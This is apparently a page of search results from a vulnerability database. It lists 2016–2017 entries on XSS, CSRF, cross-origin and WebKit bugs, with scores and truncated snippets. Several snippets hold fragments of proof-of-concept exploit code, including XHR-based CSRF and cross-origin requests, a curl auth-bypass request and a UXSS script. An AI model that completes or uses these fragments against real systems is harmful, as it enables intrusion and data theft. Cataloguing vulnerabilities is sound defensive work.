
845 matches found

seebug.org
added 2017/10/09 12:0 a.m. | 56 views

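Safari 10 cross-origin vulnerability

In Safari 10, XMLHttpRequest in the null origin can freely make cross-origin requests and set HTTP headers. After I submitted this to Apple's bug reporter and emailed Apple, they quietly fixed the vulnerability themselves without even sending me an email, so I decided to publish the PoC. This is a screenshot I took before the vulnerability was fixed: This vulnerability allows a same-origin policy bypass and arbitrary cross-origin access; this is the code I wrote to fetch Gmail data: html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...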

7 AI score
Exploits: 0
wpexploit
added 2017/09/21 12:0 a.m. | 28 views

Student Result or Employee Database <= 1.6.3 - Auth Bypass

The Student Result or Employee Database WordPress plugin was affected by an Auth Bypass security vulnerability. curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer:...

6.4 CVSS | 1.3 AI score | 0.00408 EPSS
Exploits: 2 | References: 2
exploitpack
added 2017/09/07 12:0 a.m. | 33 views

Roteador Wireless Intelbras WRN150 - Cross-Site Scripting

Roteador Wireless Intelbras WRN150 - Cross-Site Scripting Exploit Title: XSS persistent on intelbras router with firmware WRN 250 Date: 07/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150Mbps - WRN 240 Tested on: kali linux, windows...

4.3 CVSS | 6.1 AI score | 0.00305 EPSS
Exploits: 5
exploitpack
added 2017/08/03 12:0 a.m. | 27 views

Technicolor TC7337 - SSID Persistent Cross-Site Scripting

Technicolor TC7337 - SSID Persistent Cross-Site Scripting // Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not require quotes, and passing the URL with only '//...

6.8 AI score
Exploits: 0
0day.today
added 2017/08/02 12:0 a.m. | 65 views

Technicolor TC7337 - SSID Persistent Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications // Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not require quotes, and passing the URL with only '//' //...

4.3 CVSS | 6.5 AI score | 0.00401 EPSS
Exploits: 3
RedHat Linux
added 2017/06/14 7:51 a.m. | 1 views

Mozilla: Use-after-free and use-after-scope logging XHR header errors (MFSA 2017-16)

A use-after-free and use-after-scope vulnerability when logging errors from headers for XML HTTP Requests (XHR). This could result in a potentially exploitable crash. This vulnerability affects Firefox 54, Firefox ESR 52.2, and Thunderbird 52.2...

9.8 CVSS | 7.4 AI score | 0.01874 EPSS
Exploits: 0 | References: 5
Exploit DB
added 2017/06/01 12:0 a.m. | 47 views

WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting

Click anywhere... function createURLdata, type = 'text/html' return URL.createObjectURLnew Blobdata, type: type; function navigatew, url let a = w.document.createElement'a'; a.href = url; a.click; window.onclick = = window.w = open'about:blank', 'w', 'width=500, height=500'; let i0 =...

7.4 AI score
Exploits: 0
Packet Storm
added 2017/06/01 12:0 a.m. | 44 views

WebKit CachedFrameBase::restore Universal Cross Site Scripting

WebKit: UXSS via CachedFrameBase::restore This is similar to the case https://bugs.chromium.org/p/project-zero/issues/detail?id=1151. But this time, javascript handlers may be fired in FrameLoader::open. void FrameLoader::openCachedFrameBase& cachedFrame ... cleardocument, true, true,...

7.4 AI score
Exploits: 0
Packet Storm
added 2017/04/10 12:0 a.m. | 58 views

WebKit WebCore::toJS Use-After-Free

WebKit: WebCore::toJS use-after-free CVE-2017-2476 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: function freememory var a; forvar i=0;i...

6.8 CVSS | 7.5 AI score | 0.05257 EPSS
Exploits: 4
Tenable Nessus
added 2017/03/20 12:0 a.m. | 23 views

Debian DLA-859-1 : calibre security update

It was found that a JavaScript present in the book can access files on the computer using XMLHttpRequest. For Debian 7 'Wheezy', these problems have been fixed in version 0.8.51+dfsg1-0.1+deb7u1. We recommend that you upgrade your calibre packages. NOTE: Tenable Network Security has extracted the...

5.5 CVSS | 5.5 AI score | 0.0039 EPSS
Exploits: 1 | References: 3
Hacker One
added 2017/02/24 10:26 p.m. | 35 views

Files.com: CSRF @ configuration

Enter the support PIN from your test site if applicable: Enter the name of your test site if applicable: gaming2 Enter the subdomain from your test site if applicable: gaming2 Fill in the rest of your report below: ---- Greetings guys, I found a CSRF bug at the configuration - General form in all...

6.8 AI score
Exploits: 0
exploitpack
added 2017/02/23 12:0 a.m. | 23 views

Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution Arbitrary File Read

Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution Arbitrary File Read / OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read. HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open...

0.8 AI score
Exploits: 0
0day.today
added 2016/12/16 12:0 a.m. | 48 views

Horos 2.1.0 Cross Site Scripting Vulnerability

Exploit for macOS platform in category dos / poc Horos 2.1.0 Web Portal DOM Based XSS Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: Horos™ is an open-source, free medical image viewer. The goal of the Horos Project is to develop a fully...

7 AI score
Exploits: 0
Packet Storm
added 2016/12/12 12:0 a.m. | 158 views

XFINITY Gateway Technicolor DPC3941T Cross Site Request Forgery

Exploit Title: CSRF XFINITY Gateway product Technicolor (previously Cisco) DPC3941T Date: 12/12/2016 Exploit Author: Ayushman Dutta Version: dpc3941-P20-18-v303r20421733-160413a-CMCST CVE : CVE-2016-7454 The Device DPC3941T is vulnerable to CSRF and has no security on the entire admin panel for it...

0.3 AI score | 0.01038 EPSS
Exploits: 6
Packet Storm
added 2016/10/20 12:0 a.m. | 27 views

CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload

Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF shell.php Author: Besim Google Dork: - Date: 19/10/2016 Type: webapps Platform : PHP Vendor Homepage: - Software Link:...

0.3 AI score
Exploits: 0
Exploit DB
added 2016/10/17 12:0 a.m. | 31 views

Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting

Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin Date: 15-10-2016 Software Link: http://www.subrion.org/download/ Vendor: http://www.subrion.org Google Dork: "Powered by Subrion CMS" Exploit Author: Ahsan Tahir Contact: https://twitter.com/AhsanTahirAT |...

7.4 AI score
Exploits: 0
Packet Storm
added 2016/10/13 12:0 a.m. | 26 views

ApPHP MicroBlog 1.0.2 Cross Site Request Forgery

Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Author : Besim Google Dork : Date : 12/10/2016 Type : webapps Platform : PHP Vendor Homepage : - Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 CSRF PoC function submitRequest var xhr = new...

0.6 AI score
Exploits: 0
Packet Storm
added 2016/10/13 12:0 a.m. | 34 views

phpEnter 4.2.7 Cross Site Request Forgery

function submitRequest var xhr = new XMLHttpRequest; xhr.open"POST", "http://sitename/path/addnews.php", true; xhr.setRequestHeader"Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8"; xhr.setRequestHeader"Accept-Language", "en-US,en;q=0.5"; xhr.setRequestHeader"Content-Type"...

0.2 AI score
Exploits: 0
exploitpack
added 2016/10/11 12:0 a.m. | 28 views

ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)

ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Author : Besim Google Dork : Date : 12/10/2016 Type : webapps Platform : PHP Vendor Homepage : - Software link :...

0.3 AI score
Exploits: 0
Exploit DB
added 2016/10/11 12:0 a.m. | 21 views

ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)

Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Author : Besim Google Dork : Date : 12/10/2016 Type : webapps Platform : PHP Vendor Homepage : - Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 CSRF PoC function submitRequest var xhr = new...

7.4 AI score
Exploits: 0